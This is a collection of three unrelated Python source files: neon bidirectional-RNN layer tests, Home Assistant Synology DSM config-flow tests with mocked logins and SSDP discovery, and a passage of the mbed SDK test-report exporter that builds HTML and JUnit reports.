inp_rnn = rnn.be.array(lr)
# outputs
out_lr = birnn.fprop(inp_lr).get().copy()
birnn.h_buffer[:] = 0
out_rl = birnn.fprop(inp_rl).get()
out_rnn = rnn.fprop(inp_rnn).get().copy()
# views
out_lr_f_s = get_steps(out_lr[:nout], out_shape)
out_lr_b_s = get_steps(out_lr[nout:], out_shape)
out_rl_f_s = get_steps(out_rl[:nout], out_shape)
out_rl_b_s = get_steps(out_rl[nout:], out_shape)
out_rnn_s = get_steps(out_rnn, out_shape)
# asserts for fprop
for x_rnn, x_f, x_b, y_f, y_b in zip(out_rnn_s, out_lr_f_s, out_lr_b_s,
reversed(out_rl_f_s), reversed(out_rl_b_s)):
assert np.allclose(x_f, y_b, rtol=0.0, atol=1.0e-5)
assert np.allclose(x_b, y_f, rtol=0.0, atol=1.0e-5)
assert np.allclose(x_rnn, x_f, rtol=0.0, atol=1.0e-5)
assert np.allclose(x_rnn, y_b, rtol=0.0, atol=1.0e-5)
def test_biRNN_fprop(backend_default, fargs):
# basic sanity check with 0 weights random inputs
seq_len, input_size, hidden_size, batch_size = fargs
in_shape = (input_size, seq_len)
out_shape = (hidden_size, seq_len)
NervanaObject.be.bsz = batch_size
# setup the bi-directional rnn
init_glorot = GlorotUniform()
birnn = BiRNN(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
birnn.configure(in_shape)
birnn.prev_layer = True
birnn.allocate()
# same weight
nout = hidden_size
birnn.W_input_b[:] = birnn.W_input_f
birnn.W_recur_b[:] = birnn.W_recur_f
birnn.b_b[:] = birnn.b_f
birnn.dW[:] = 0
# inputs - random and flipped left-to-right inputs
lr = np.random.random((input_size, seq_len * batch_size))
lr_rev = list(reversed(get_steps(lr.copy(), in_shape)))
rl = con(lr_rev, axis=1)
inp_lr = birnn.be.array(lr)
inp_rl = birnn.be.array(rl)
# outputs
out_lr = birnn.fprop(inp_lr).get().copy()
birnn.h_buffer[:] = 0
out_rl = birnn.fprop(inp_rl).get().copy()
# views
out_lr_f_s = get_steps(out_lr[:nout], out_shape)
out_lr_b_s = get_steps(out_lr[nout:], out_shape)
out_rl_f_s = get_steps(out_rl[:nout], out_shape)
out_rl_b_s = get_steps(out_rl[nout:], out_shape)
# asserts
for x_f, x_b, y_f, y_b in zip(out_lr_f_s, out_lr_b_s,
reversed(out_rl_f_s), reversed(out_rl_b_s)):
assert np.allclose(x_f, y_b, rtol=0.0, atol=1.0e-5)
assert np.allclose(x_b, y_f, rtol=0.0, atol=1.0e-5)
def test_biRNN_bprop(backend_default, fargs, deltas_buffer):
# basic sanity check with 0 weights random inputs
seq_len, input_size, hidden_size, batch_size = fargs
in_shape = (input_size, seq_len)
NervanaObject.be.bsz = batch_size
# setup the bi-directional rnn
init_glorot = GlorotUniform()
birnn = BiRNN(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
birnn.configure(in_shape)
birnn.prev_layer = True
birnn.allocate()
birnn.allocate_deltas(deltas_buffer)
deltas_buffer.allocate_buffers()
birnn.set_deltas(deltas_buffer)
# same weight for bi-rnn backward and rnn weights
birnn.W_input_b[:] = birnn.W_input_f
birnn.W_recur_b[:] = birnn.W_recur_f
birnn.b_b[:] = birnn.b_f
birnn.dW[:] = 0
# same weight for bi-directional rnn
init_glorot = GlorotUniform()
rnn = Recurrent(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
rnn.configure(in_shape)
rnn.prev_layer = True
rnn.allocate()
rnn.allocate_deltas(deltas_buffer)
deltas_buffer.allocate_buffers()
rnn.set_deltas(deltas_buffer)
# inputs and views
lr = np.random.random((input_size, seq_len * batch_size))
lr_rev = list(reversed(get_steps(lr.copy(), in_shape)))
rl = con(lr_rev, axis=1)
# allocate gpu buffers
inp_lr = birnn.be.array(lr)
inp_rl = birnn.be.array(rl)
# outputs
out_lr_g = birnn.fprop(inp_lr)
del_lr = birnn.bprop(out_lr_g).get().copy()
birnn.h_buffer[:] = 0
out_rl_g = birnn.fprop(inp_rl)
del_rl = birnn.bprop(out_rl_g).get().copy()
del_lr_s = get_steps(del_lr, in_shape)
del_rl_s = get_steps(del_rl, in_shape)
for (x, y) in zip(del_lr_s, reversed(del_rl_s)):
assert np.allclose(x, y, rtol=0.0, atol=1.0e-5)
def test_biSum(backend_default, fargs, deltas_buffer):
seq_len, input_size, hidden_size, batch_size = fargs
input_size *= 2
in_shape = (input_size, seq_len)
NervanaObject.be.bsz = batch_size
bisum = BiSum()
bisum.configure(in_shape)
bisum.prev_layer = True
bisum.allocate()
bisum.allocate_deltas(deltas_buffer)
deltas_buffer.allocate_buffers()
bisum.set_deltas(deltas_buffer)
# inputs
inp_np = np.random.random((input_size, seq_len * batch_size))
inp_be = bisum.be.array(inp_np)
# outputs
out_be = bisum.fprop(inp_be)
del_be = bisum.bprop(out_be)
out_ref = bisum.be.empty_like(out_be)
out_ref[:] = inp_be[:input_size // 2] + inp_be[input_size // 2:]
assert out_be.shape[0] * 2 == inp_be.shape[0]
assert allclose_with_out(out_be.get(), out_ref.get(), rtol=0.0, atol=1.0e-5)
assert allclose_with_out(del_be[:input_size // 2].get(), out_be.get(), rtol=0.0, atol=1.0e-5)
assert allclose_with_out(del_be[input_size // 2:].get(), out_be.get(), rtol=0.0, atol=1.0e-5)
def test_bibn(backend_default, fargs, deltas_buffer):
seq_len, input_size, hidden_size, batch_size = fargs
in_shape = (input_size, seq_len)
NervanaObject.be.bsz = batch_size
hidden_size = min(10, hidden_size)
# setup the bi-directional rnn
init_glorot = GlorotUniform()
birnn = BiBNRNN(hidden_size, activation=Rectlinclip(slope=0), init=init_glorot)
birnn.configure(in_shape)
birnn.prev_layer = True
birnn.allocate()
birnn.allocate_deltas(deltas_buffer)
deltas_buffer.allocate_buffers()
birnn.set_deltas(deltas_buffer)
# test fprop
# set the ff buffer
inp_np = np.random.random(birnn.h_ff_buffer.shape)
inp_be = birnn.be.array(inp_np)
birnn.h_ff_buffer[:] = inp_np
# compare the bn output with calling the backend bn
xsum = birnn.be.zeros_like(birnn.xmean)
xvar = birnn.be.zeros_like(birnn.xvar)
gmean = birnn.be.zeros_like(birnn.gmean)
gvar = birnn.be.zeros_like(birnn.gvar)
gamma = birnn.be.ones(birnn.gamma.shape)
beta = birnn.be.zeros_like(birnn.beta)
grad_gamma = birnn.be.zeros_like(gamma)
grad_beta = birnn.be.zeros_like(beta)
out_ref = birnn.be.zeros_like(birnn.h_ff_buffer)
xsum[:] = birnn.be.sum(birnn.h_ff_buffer, axis=1)
birnn.be.compound_fprop_bn(
birnn.h_ff_buffer, xsum, xvar, gmean, gvar,
gamma, beta, out_ref, birnn.eps, birnn.rho,
accumbeta=0, relu=False)
# call the bibnrnn layer fprop_bn
out_bn = birnn._fprop_bn(birnn.h_ff_buffer, inference=False)
assert allclose_with_out(out_bn.get(), out_ref.get(), rtol=0.0, atol=1.0e-5)
# test bprop
err_np = np.random.random(birnn.h_ff_buffer.shape)
err_be = birnn.be.array(err_np)
err_out_ref = birnn.be.empty_like(err_be)
birnn.be.compound_bprop_bn(err_out_ref, grad_gamma, grad_beta,
err_be,
inp_be, xsum, xvar, gamma,
birnn.eps)
err_out_bn = birnn._bprop_bn(err_be, out_bn)
assert allclose_with_out(err_out_bn.get(), err_out_ref.get(), rtol=0.0, atol=2.5e-5)
|
|
"""Tests for the Synology DSM config flow."""
from unittest.mock import MagicMock, Mock, patch
import pytest
from synology_dsm.exceptions import (
SynologyDSMException,
SynologyDSMLogin2SAFailedException,
SynologyDSMLogin2SARequiredException,
SynologyDSMLoginInvalidException,
SynologyDSMRequestException,
)
from homeassistant import data_entry_flow
from homeassistant.components import ssdp
from homeassistant.components.synology_dsm.config_flow import CONF_OTP_CODE
from homeassistant.components.synology_dsm.const import (
CONF_VOLUMES,
DEFAULT_PORT,
DEFAULT_PORT_SSL,
DEFAULT_SCAN_INTERVAL,
DEFAULT_TIMEOUT,
DEFAULT_USE_SSL,
DEFAULT_VERIFY_SSL,
DOMAIN,
)
from homeassistant.config_entries import SOURCE_REAUTH, SOURCE_SSDP, SOURCE_USER
from homeassistant.const import (
CONF_DISKS,
CONF_HOST,
CONF_MAC,
CONF_PASSWORD,
CONF_PORT,
CONF_SCAN_INTERVAL,
CONF_SSL,
CONF_TIMEOUT,
CONF_USERNAME,
CONF_VERIFY_SSL,
)
from homeassistant.core import HomeAssistant
from .consts import (
DEVICE_TOKEN,
HOST,
MACS,
PASSWORD,
PORT,
SERIAL,
SERIAL_2,
USE_SSL,
USERNAME,
VERIFY_SSL,
)
from tests.common import MockConfigEntry
@pytest.fixture(name="service")
def mock_controller_service():
"""Mock a successful service."""
with patch(
"homeassistant.components.synology_dsm.config_flow.SynologyDSM"
) as service_mock:
service_mock.return_value.information.serial = SERIAL
service_mock.return_value.utilisation.cpu_user_load = 1
service_mock.return_value.storage.disks_ids = ["sda", "sdb", "sdc"]
service_mock.return_value.storage.volumes_ids = ["volume_1"]
service_mock.return_value.network.macs = MACS
yield service_mock
@pytest.fixture(name="service_2sa")
def mock_controller_service_2sa():
"""Mock a successful service with 2SA login."""
with patch(
"homeassistant.components.synology_dsm.config_flow.SynologyDSM"
) as service_mock:
service_mock.return_value.login = Mock(
side_effect=SynologyDSMLogin2SARequiredException(USERNAME)
)
service_mock.return_value.information.serial = SERIAL
service_mock.return_value.utilisation.cpu_user_load = 1
service_mock.return_value.storage.disks_ids = ["sda", "sdb", "sdc"]
service_mock.return_value.storage.volumes_ids = ["volume_1"]
service_mock.return_value.network.macs = MACS
yield service_mock
@pytest.fixture(name="service_vdsm")
def mock_controller_service_vdsm():
"""Mock a successful service."""
with patch(
"homeassistant.components.synology_dsm.config_flow.SynologyDSM"
) as service_mock:
service_mock.return_value.information.serial = SERIAL
service_mock.return_value.utilisation.cpu_user_load = 1
service_mock.return_value.storage.disks_ids = []
service_mock.return_value.storage.volumes_ids = ["volume_1"]
service_mock.return_value.network.macs = MACS
yield service_mock
@pytest.fixture(name="service_failed")
def mock_controller_service_failed():
"""Mock a failed service."""
with patch(
"homeassistant.components.synology_dsm.config_flow.SynologyDSM"
) as service_mock:
service_mock.return_value.information.serial = None
service_mock.return_value.utilisation.cpu_user_load = None
service_mock.return_value.storage.disks_ids = []
service_mock.return_value.storage.volumes_ids = []
service_mock.return_value.network.macs = []
yield service_mock
async def test_user(hass: HomeAssistant, service: MagicMock):
"""Test user config."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data=None
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
# test with all provided
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: HOST,
CONF_PORT: PORT,
CONF_SSL: USE_SSL,
CONF_VERIFY_SSL: VERIFY_SSL,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["result"].unique_id == SERIAL
assert result["title"] == HOST
assert result["data"][CONF_HOST] == HOST
assert result["data"][CONF_PORT] == PORT
assert result["data"][CONF_SSL] == USE_SSL
assert result["data"][CONF_VERIFY_SSL] == VERIFY_SSL
assert result["data"][CONF_USERNAME] == USERNAME
assert result["data"][CONF_PASSWORD] == PASSWORD
assert result["data"][CONF_MAC] == MACS
assert result["data"].get("device_token") is None
assert result["data"].get(CONF_DISKS) is None
assert result["data"].get(CONF_VOLUMES) is None
service.return_value.information.serial = SERIAL_2
# test without port + False SSL
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: HOST,
CONF_SSL: False,
CONF_VERIFY_SSL: VERIFY_SSL,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["result"].unique_id == SERIAL_2
assert result["title"] == HOST
assert result["data"][CONF_HOST] == HOST
assert result["data"][CONF_PORT] == DEFAULT_PORT
assert not result["data"][CONF_SSL]
assert result["data"][CONF_VERIFY_SSL] == VERIFY_SSL
assert result["data"][CONF_USERNAME] == USERNAME
assert result["data"][CONF_PASSWORD] == PASSWORD
assert result["data"][CONF_MAC] == MACS
assert result["data"].get("device_token") is None
assert result["data"].get(CONF_DISKS) is None
assert result["data"].get(CONF_VOLUMES) is None
async def test_user_2sa(hass: HomeAssistant, service_2sa: MagicMock):
"""Test user with 2sa authentication config."""
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "2sa"
# Failed the first time because was too slow to enter the code
service_2sa.return_value.login = Mock(
side_effect=SynologyDSMLogin2SAFailedException
)
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {CONF_OTP_CODE: "000000"}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "2sa"
assert result["errors"] == {CONF_OTP_CODE: "otp_failed"}
# Successful login with 2SA code
service_2sa.return_value.login = Mock(return_value=True)
service_2sa.return_value.device_token = DEVICE_TOKEN
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {CONF_OTP_CODE: "123456"}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["result"].unique_id == SERIAL
assert result["title"] == HOST
assert result["data"][CONF_HOST] == HOST
assert result["data"][CONF_PORT] == DEFAULT_PORT_SSL
assert result["data"][CONF_SSL] == DEFAULT_USE_SSL
assert result["data"][CONF_VERIFY_SSL] == DEFAULT_VERIFY_SSL
assert result["data"][CONF_USERNAME] == USERNAME
assert result["data"][CONF_PASSWORD] == PASSWORD
assert result["data"][CONF_MAC] == MACS
assert result["data"].get("device_token") == DEVICE_TOKEN
assert result["data"].get(CONF_DISKS) is None
assert result["data"].get(CONF_VOLUMES) is None
async def test_user_vdsm(hass: HomeAssistant, service_vdsm: MagicMock):
"""Test user config."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data=None
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "user"
# test with all provided
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={
CONF_HOST: HOST,
CONF_PORT: PORT,
CONF_SSL: USE_SSL,
CONF_VERIFY_SSL: VERIFY_SSL,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["result"].unique_id == SERIAL
assert result["title"] == HOST
assert result["data"][CONF_HOST] == HOST
assert result["data"][CONF_PORT] == PORT
assert result["data"][CONF_SSL] == USE_SSL
assert result["data"][CONF_VERIFY_SSL] == VERIFY_SSL
assert result["data"][CONF_USERNAME] == USERNAME
assert result["data"][CONF_PASSWORD] == PASSWORD
assert result["data"][CONF_MAC] == MACS
assert result["data"].get("device_token") is None
assert result["data"].get(CONF_DISKS) is None
assert result["data"].get(CONF_VOLUMES) is None
async def test_reauth(hass: HomeAssistant, service: MagicMock):
"""Test reauthentication."""
entry = MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: HOST,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: f"{PASSWORD}_invalid",
},
unique_id=SERIAL,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.config_entries.ConfigEntries.async_reload",
return_value=True,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={
"source": SOURCE_REAUTH,
"entry_id": entry.entry_id,
"unique_id": entry.unique_id,
},
data={
CONF_HOST: HOST,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth_confirm"
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reauth_successful"
async def test_reconfig_user(hass: HomeAssistant, service: MagicMock):
"""Test re-configuration of already existing entry by user."""
MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: "wrong_host",
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
},
unique_id=SERIAL,
).add_to_hass(hass)
with patch(
"homeassistant.config_entries.ConfigEntries.async_reload",
return_value=True,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reconfigure_successful"
async def test_login_failed(hass: HomeAssistant, service: MagicMock):
"""Test when we have errors during login."""
service.return_value.login = Mock(
side_effect=(SynologyDSMLoginInvalidException(USERNAME))
)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {CONF_USERNAME: "invalid_auth"}
async def test_connection_failed(hass: HomeAssistant, service: MagicMock):
"""Test when we have errors during connection."""
service.return_value.login = Mock(
side_effect=SynologyDSMRequestException(IOError("arg"))
)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {CONF_HOST: "cannot_connect"}
async def test_unknown_failed(hass: HomeAssistant, service: MagicMock):
"""Test when we have an unknown error."""
service.return_value.login = Mock(side_effect=SynologyDSMException(None, None))
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {"base": "unknown"}
async def test_missing_data_after_login(hass: HomeAssistant, service_failed: MagicMock):
"""Test when we have errors during connection."""
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data={CONF_HOST: HOST, CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {"base": "missing_data"}
async def test_form_ssdp(hass: HomeAssistant, service: MagicMock):
"""Test we can setup from ssdp."""
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_SSDP},
data=ssdp.SsdpServiceInfo(
ssdp_usn="mock_usn",
ssdp_st="mock_st",
ssdp_location="http://192.168.1.5:5000",
upnp={
ssdp.ATTR_UPNP_FRIENDLY_NAME: "mydsm",
ssdp.ATTR_UPNP_SERIAL: "001132XXXX99", # MAC address, but SSDP does not have `-`
},
),
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "link"
assert result["errors"] == {}
result = await hass.config_entries.flow.async_configure(
result["flow_id"], {CONF_USERNAME: USERNAME, CONF_PASSWORD: PASSWORD}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["result"].unique_id == SERIAL
assert result["title"] == "192.168.1.5"
assert result["data"][CONF_HOST] == "192.168.1.5"
assert result["data"][CONF_PORT] == 5001
assert result["data"][CONF_SSL] == DEFAULT_USE_SSL
assert result["data"][CONF_VERIFY_SSL] == DEFAULT_VERIFY_SSL
assert result["data"][CONF_USERNAME] == USERNAME
assert result["data"][CONF_PASSWORD] == PASSWORD
assert result["data"][CONF_MAC] == MACS
assert result["data"].get("device_token") is None
assert result["data"].get(CONF_DISKS) is None
assert result["data"].get(CONF_VOLUMES) is None
async def test_reconfig_ssdp(hass: HomeAssistant, service: MagicMock):
"""Test re-configuration of already existing entry by ssdp."""
MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: "wrong_host",
CONF_VERIFY_SSL: VERIFY_SSL,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
CONF_MAC: MACS,
},
unique_id=SERIAL,
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_SSDP},
data=ssdp.SsdpServiceInfo(
ssdp_usn="mock_usn",
ssdp_st="mock_st",
ssdp_location="http://192.168.1.5:5000",
upnp={
ssdp.ATTR_UPNP_FRIENDLY_NAME: "mydsm",
ssdp.ATTR_UPNP_SERIAL: "001132XXXX59", # Existing in MACS[0], but SSDP does not have `-`
},
),
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reconfigure_successful"
async def test_skip_reconfig_ssdp(hass: HomeAssistant, service: MagicMock):
"""Test re-configuration of already existing entry by ssdp."""
MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: "wrong_host",
CONF_VERIFY_SSL: True,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
CONF_MAC: MACS,
},
unique_id=SERIAL,
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_SSDP},
data=ssdp.SsdpServiceInfo(
ssdp_usn="mock_usn",
ssdp_st="mock_st",
ssdp_location="http://192.168.1.5:5000",
upnp={
ssdp.ATTR_UPNP_FRIENDLY_NAME: "mydsm",
ssdp.ATTR_UPNP_SERIAL: "001132XXXX59", # Existing in MACS[0], but SSDP does not have `-`
},
),
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_configured"
async def test_existing_ssdp(hass: HomeAssistant, service: MagicMock):
"""Test abort of already existing entry by ssdp."""
MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: "192.168.1.5",
CONF_VERIFY_SSL: VERIFY_SSL,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
CONF_MAC: MACS,
},
unique_id=SERIAL,
).add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_SSDP},
data=ssdp.SsdpServiceInfo(
ssdp_usn="mock_usn",
ssdp_st="mock_st",
ssdp_location="http://192.168.1.5:5000",
upnp={
ssdp.ATTR_UPNP_FRIENDLY_NAME: "mydsm",
ssdp.ATTR_UPNP_SERIAL: "001132XXXX59", # Existing in MACS[0], but SSDP does not have `-`
},
),
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_configured"
async def test_options_flow(hass: HomeAssistant, service: MagicMock):
"""Test config flow options."""
config_entry = MockConfigEntry(
domain=DOMAIN,
data={
CONF_HOST: HOST,
CONF_USERNAME: USERNAME,
CONF_PASSWORD: PASSWORD,
CONF_MAC: MACS,
},
unique_id=SERIAL,
)
config_entry.add_to_hass(hass)
assert config_entry.options == {}
result = await hass.config_entries.options.async_init(config_entry.entry_id)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "init"
# Scan interval
# Default
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert config_entry.options[CONF_SCAN_INTERVAL] == DEFAULT_SCAN_INTERVAL
assert config_entry.options[CONF_TIMEOUT] == DEFAULT_TIMEOUT
# Manual
result = await hass.config_entries.options.async_init(config_entry.entry_id)
result = await hass.config_entries.options.async_configure(
result["flow_id"],
user_input={CONF_SCAN_INTERVAL: 2, CONF_TIMEOUT: 30},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert config_entry.options[CONF_SCAN_INTERVAL] == 2
assert config_entry.options[CONF_TIMEOUT] == 30
|
|
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <[email protected]>
"""
from tools.utils import construct_enum, mkdir
from prettytable import PrettyTable
import os
ResultExporterType = construct_enum(HTML='Html_Exporter',
JUNIT='JUnit_Exporter',
JUNIT_OPER='JUnit_Exporter_Interoperability',
BUILD='Build_Exporter',
TEXT='Text_Exporter',
PRINT='Print_Exporter')
class ReportExporter(object):
""" Class exports extended test result Python data structure to
different formats like HTML, JUnit XML.
Parameter 'test_result_ext' format:
u'uARM': { u'LPC1768': { 'MBED_2': { 0: { 'copy_method': 'shutils.copy()',
'duration': 20,
'elapsed_time': 1.7929999828338623,
'output': 'Host test instrumentation on ...\r\n',
'result': 'OK',
'target_name': u'LPC1768',
'description': 'stdio',
'id': u'MBED_2',
'toolchain_name': u'uARM'}},
"""
CSS_STYLE = """<style>
.name{
border: 1px solid;
border-radius: 25px;
width: 100px;
}
.tooltip{
position:absolute;
background-color: #F5DA81;
display:none;
}
</style>
"""
JAVASCRIPT = """
<script type="text/javascript">
function show (elem) {
elem.style.display = "block";
}
function hide (elem) {
elem.style.display = "";
}
</script>
"""
def __init__(self, result_exporter_type, package="test"):
self.result_exporter_type = result_exporter_type
self.package = package
def report(self, test_summary_ext, test_suite_properties=None,
print_log_for_failures=True):
""" Invokes report depending on exporter_type set in constructor
"""
if self.result_exporter_type == ResultExporterType.HTML:
# HTML exporter
return self.exporter_html(test_summary_ext, test_suite_properties)
elif self.result_exporter_type == ResultExporterType.JUNIT:
# JUNIT exporter for results from test suite
return self.exporter_junit(test_summary_ext, test_suite_properties)
elif self.result_exporter_type == ResultExporterType.JUNIT_OPER:
# JUNIT exporter for interoperability test
return self.exporter_junit_ioper(test_summary_ext, test_suite_properties)
elif self.result_exporter_type == ResultExporterType.PRINT:
# JUNIT exporter for interoperability test
return self.exporter_print(test_summary_ext, print_log_for_failures=print_log_for_failures)
elif self.result_exporter_type == ResultExporterType.TEXT:
return self.exporter_text(test_summary_ext)
return None
def report_to_file(self, test_summary_ext, file_name, test_suite_properties=None):
""" Stores report to specified file
"""
report = self.report(test_summary_ext, test_suite_properties=test_suite_properties)
self.write_to_file(report, file_name)
def write_to_file(self, report, file_name):
if report is not None:
dirname = os.path.dirname(file_name)
if dirname:
mkdir(dirname)
with open(file_name, 'w') as f:
f.write(report)
def get_tooltip_name(self, toolchain, target, test_id, loop_no):
""" Generate simple unique tool-tip name which can be used.
For example as HTML <div> section id attribute.
"""
return "target_test_%s_%s_%s_%s"% (toolchain.lower(), target.lower(), test_id.lower(), loop_no)
def get_result_div_sections(self, test, test_no):
""" Generates separate <DIV> sections which contains test results output.
"""
RESULT_COLORS = {'OK': 'LimeGreen',
'FAIL': 'Orange',
'ERROR': 'LightCoral',
'OTHER': 'LightGray',
}
tooltip_name = self.get_tooltip_name(test['toolchain_name'], test['target_name'], test['id'], test_no)
background_color = RESULT_COLORS[test['result'] if test['result'] in RESULT_COLORS else 'OTHER']
result_div_style = "background-color: %s"% background_color
result = """<div class="name" style="%s" onmouseover="show(%s)" onmouseout="hide(%s)">
<center>%s</center>
<div class = "tooltip" id= "%s">
<b>%s</b><br />
<hr />
<b>%s</b> in <b>%.2f sec</b><br />
<hr />
<small>
%s
</small>
</div>
</div>
"""% (result_div_style,
tooltip_name,
tooltip_name,
test['result'],
tooltip_name,
test['target_name_unique'],
test['description'],
test['elapsed_time'],
test['output'].replace('\n', '<br />'))
return result
def get_result_tree(self, test_results):
""" If test was run in a loop (we got few results from the same test)
we will show it in a column to see all results.
This function produces HTML table with corresponding results.
"""
result = ''
for i, test_result in enumerate(test_results):
result += '<table>'
test_ids = sorted(test_result.keys())
for test_no in test_ids:
test = test_result[test_no]
result += """<tr>
<td valign="top">%s</td>
</tr>"""% self.get_result_div_sections(test, "%d_%d" % (test_no, i))
result += '</table>'
return result
def get_all_unique_test_ids(self, test_result_ext):
""" Gets all unique test ids from all ran tests.
We need this to create complete list of all test ran.
"""
result = []
targets = test_result_ext.keys()
for target in targets:
toolchains = test_result_ext[target].keys()
for toolchain in toolchains:
tests = test_result_ext[target][toolchain].keys()
result.extend(tests)
return sorted(list(set(result)))
#
# Exporters functions
#
def exporter_html(self, test_result_ext, test_suite_properties=None):
""" Export test results in proprietary HTML format.
"""
result = """<html>
<head>
<title>mbed SDK test suite test result report</title>
%s
%s
</head>
<body>
"""% (self.CSS_STYLE, self.JAVASCRIPT)
unique_test_ids = self.get_all_unique_test_ids(test_result_ext)
targets = sorted(test_result_ext.keys())
result += '<table>'
for target in targets:
toolchains = sorted(test_result_ext[target].keys())
for toolchain in toolchains:
result += '<tr>'
result += '<td></td>'
result += '<td></td>'
tests = sorted(test_result_ext[target][toolchain].keys())
for test in unique_test_ids:
result += """<td align="center">%s</td>"""% test
result += """</tr>
<tr>
<td valign="center">%s</td>
<td valign="center"><b>%s</b></td>
"""% (toolchain, target)
for test in unique_test_ids:
test_result = self.get_result_tree(test_result_ext[target][toolchain][test]) if test in tests else ''
result += '<td>%s</td>'% (test_result)
result += '</tr>'
result += '</table>'
result += '</body></html>'
return result
def exporter_junit_ioper(self, test_result_ext, test_suite_properties=None):
from junit_xml import TestSuite, TestCase
test_suites = []
test_cases = []
for platform in sorted(test_result_ext.keys()):
# {platform : ['Platform', 'Result', 'Scope', 'Description'])
test_cases = []
for tr_result in test_result_ext[platform]:
result, name, scope, description = tr_result
classname = 'test.ioper.%s.%s.%s' % (platform, name, scope)
elapsed_sec = 0
_stdout = description
_stderr = ''
# Test case
